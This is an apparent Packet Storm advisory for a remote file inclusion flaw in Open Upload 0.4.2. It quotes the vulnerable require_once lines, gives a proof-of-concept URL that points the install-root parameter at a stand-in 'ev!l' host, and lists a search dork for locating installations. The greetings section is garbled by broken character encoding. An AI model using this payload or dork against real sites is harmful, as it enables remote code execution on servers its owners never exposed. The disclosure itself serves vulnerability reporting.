Open Upload 0.4.2 Remote File Inclusion

2017-12-27T00:00:00
ID PACKETSTORM:145561
Type packetstorm
Reporter indoushka
Modified 2017-12-27T00:00:00

Description

                                        
                                            `========================================================================  
| # Title : Openupload 0.4.2 RFI vulnerability  
| # Author : indoushka  
| # email : indoushka4ever@gmail.com  
| # Tested on : windows 10 FranASSais V.(Pro)  
| # Version : 0.4.2  
| # Vendor : http://wmscripti.com/  
| # Dork : open upload - login  
========================================================================  
  
poc :  
  
www/index.php  
  
line 61,62  
require_once($configfile);  
require_once($CONFIG['INSTALL_ROOT'].'/lib/general.inc.php');  
  
127.0.0.1/open/www/index.php?CONFIG['INSTALL_ROOT']= ev!l   
  
Greetz : aua'>>a'1/2a'1/2a'dega'deg aua'degaua'degau a'>>a'*a'*auaua'>>------au-auau-a'deg a'degaua'degauPSaua'3a'>>au-------- aua'degauau!a'>>auau aua'degauaua'*oauaua'degau ------  
|  
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz |  
|  
===================== pa'degaua'1/2a'>>au auauoauau aua'>>auauauauauauC/ =============================  
`